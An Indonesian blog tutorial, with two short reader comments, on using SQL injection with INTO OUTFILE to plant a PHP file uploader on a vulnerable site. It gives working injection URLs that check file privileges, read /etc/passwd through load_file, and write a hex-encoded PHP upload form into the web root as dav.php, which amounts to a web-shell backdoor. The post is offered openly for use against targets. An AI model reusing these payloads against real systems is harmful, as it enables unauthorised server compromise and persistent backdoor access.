Posted by 
Halo gaes pada kesempatan saya kali ini saya akan sedikit sharing tutorial SQL Into outfile, sedikit pengertian SQL Into outfile sama saja dengan SQL Inject biasanya, tetapi kita tidak perlu repot2 mencari admin login / mencari uploader. Oke langsung aja ke tutorial nya..
Disini saya akan menjelaskan langsung tentang SQL Into outfile, bila kalian belum tau bagai mana cara kerja sql inject kalian bisa baca tutorial nya disini..
Pastikan kalian sudah memiliki target vuln SQL Inject..
pertama kita cek apakah bisa membuat uploader nya atau tidak, kita cek dengan kode ini..
file_priv letakan pada angka ajaibnya dan from+mysql.user letakan di akhir jumlah columns nya.
contoh..
https://blog.davnisial.me/index.php?p=news&id=-1010+union+select+1,2,3,
file_priv,5,6,7,8,9,10,11,12,13,14+from+mysql.user--
Jika seperti ini berarti target vuln gaes :v
Oke sekarang kita mencari path nya gaes dengan kode ini
load_file('etc/passwd') atau load_file(0x2f6574632f706173737764)
Contoh..
https://blog.davnisial.me/index.php?p=news&id=-1010+union+select+1,2,3,load_file
(0x2f6574632f706173737764),5,6,7,8,9,10,11,12,13,14--
Nah sudah ketemu path nya /var/www/html/ bila sudah ketemu lanjut kita membuat uploader dengan kode ini..
0x3c3f706870206563686f202755706c6f616465723c62723e273
b6563686f20273c62723e273b6563686f20273c666f726d20616374696f6e3d2
222206d6574686f643d22706f73742220656e63747970653d226d756c7469706
172742f666f726d2d6461746122206e616d653d2275706c6f616465722220696
43d2275706c6f61646572223e273b6563686f20273c696e70757420747970653
d2266696c6522206e616d653d2266696c65222073697a653d223530223e3c696
e707574206e616d653d225f75706c2220747970653d227375626d69742220696
43d225f75706c222076616c75653d2255706c6f6164223e3c2f666f726d3e273
b69662820245f504f53545b275f75706c275d203d3d202255706c6f616422202
9207b69662840636f707928245f46494c45535b2766696c65275d5b27746d705
f6e616d65275d2c20245f46494c45535b2766696c65275d5b276e616d65275d2
929207b206563686f20273c623e55706c6f6164202121213c2f623e3c62723e3
c62723e273b207d656c7365207b206563686f20273c623e55706c6f616420212
1213c2f623e3c62723e3c62723e273b207d7d3f3e,5,6,7,8,9,10,11,12,13,
14+ Letakan pada angka ajaibnya dan di akhir tambahkan
into+outfile+'/var/www/html/dav.php'--+-
Contoh..
https://blog.davnisial.me/index.php?p=news&id=-1010+union+se
lect+1,2,3,0x3c3f706870206563686f202755706c6f616465723c62723e273
b6563686f20273c62723e273b6563686f20273c666f726d20616374696f6e3d2
222206d6574686f643d22706f73742220656e63747970653d226d756c7469706
172742f666f726d2d6461746122206e616d653d2275706c6f616465722220696
43d2275706c6f61646572223e273b6563686f20273c696e70757420747970653
d2266696c6522206e616d653d2266696c65222073697a653d223530223e3c696
e707574206e616d653d225f75706c2220747970653d227375626d69742220696
43d225f75706c222076616c75653d2255706c6f6164223e3c2f666f726d3e273
b69662820245f504f53545b275f75706c275d203d3d202255706c6f616422202
9207b69662840636f707928245f46494c45535b2766696c65275d5b27746d705
f6e616d65275d2c20245f46494c45535b2766696c65275d5b276e616d65275d2
929207b206563686f20273c623e55706c6f6164202121213c2f623e3c62723e3
c62723e273b207d656c7365207b206563686f20273c623e55706c6f616420212
1213c2f623e3c62723e3c62723e273b207d7d3f3e,5,6,7,8,9,10,11,12,13,
14+into+outfile+'/var/www/dav.php'--+
Sekarang coba kita buka http://target.com/dav.php
dan sukses wkwk kita berhasil membuat uploader nya. sekian dulu tutorial nya.. apabila ada kata yang tidak di kenan mohon di maklumi, dan apabila ada yang kurang di mengerti bisa komentar dibawah..
comment 2 komentar
more_vertWow baru tahu aku
January 8, 2019 at 6:15 AMkalau bisa gini ternyata 👏
Yamat.ejeeo
June 15, 2019 at 12:27 PM